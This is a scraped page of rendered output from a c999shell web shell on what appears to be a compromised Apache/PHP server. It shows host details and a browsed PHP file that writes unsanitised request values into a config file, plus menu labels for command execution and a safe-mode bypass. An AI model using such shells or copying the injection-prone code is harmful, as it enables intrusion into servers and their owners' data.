Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis2222/ums/ drwxr-xr-x |
Viewing file: Select action/file-type: <?PHP function update_file ($fpath, $defaultval) { //include_once("../class/clsConnection.php"); // include_once("../class/clsDB.php"); $retval = false; if (file_exists($fpath)) unlink($fpath); if (($handle = fopen($fpath, "wb"))) { if (fwrite($handle, $defaultval) === FALSE) { if ($handle) fclose($handle); } else { fclose($handle); $retval = true; } } return $retval; } function folder_writable ( ) { //include_once("../class/clsConnection.php"); // include_once("../class/clsDB.php"); $retval = false; $file_name = "testwrite_" . time() . ".txt"; if (($handle = fopen($file_name, "wb"))) { $retval = true; fclose($handle); unlink($file_name); } return $retval; } $save_file = 'lib/nusoap/globalversion.php'; $server_path="http://".$server_path."/mis/version/admin/send.php"; $new_path="http://".$new_path."/mis/version/admin/send.php"; if($method=="editpath"){ $server_path=$new_path; } if (folder_writable()) { $content = implode("", @file($save_file)); $pattern = "/(\\\$GLOBALS\[\\\"SERVER_PATH\\\"\]\s\=\s)(\\\")(.*)(\\\")(\;)/"; $replaceses = $server_path; if (preg_match($pattern,$content)){ //echo "match"; $newcontent = preg_replace($pattern, "\${1}\${2}$replaceses\${4}\${5}", $content); if (update_file($save_file, $newcontent) == true) { if($method=="addpath"){ echo "<meta http-equiv='refresh' content='0; URL=updateFile.php'>"; }else if($method=="editpath"){ ?> <script language="javascript1.2"> window.close(); window.opener.location.href="updateFile.php"; </script> <? } }else{ echo "<div align=\"center\">ไม่สามารถแก้ไขชื่อเครื่องได้</div>"; exit; } }else{ //not match echo "<div align=\"center\">ไม่สามารถแก้ไขชื่อเครื่องได้</div>"; exit; } } else { echo "<div align=\"center\">".getcwd() . " cannot writable!</div>"; exit; } ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]-- |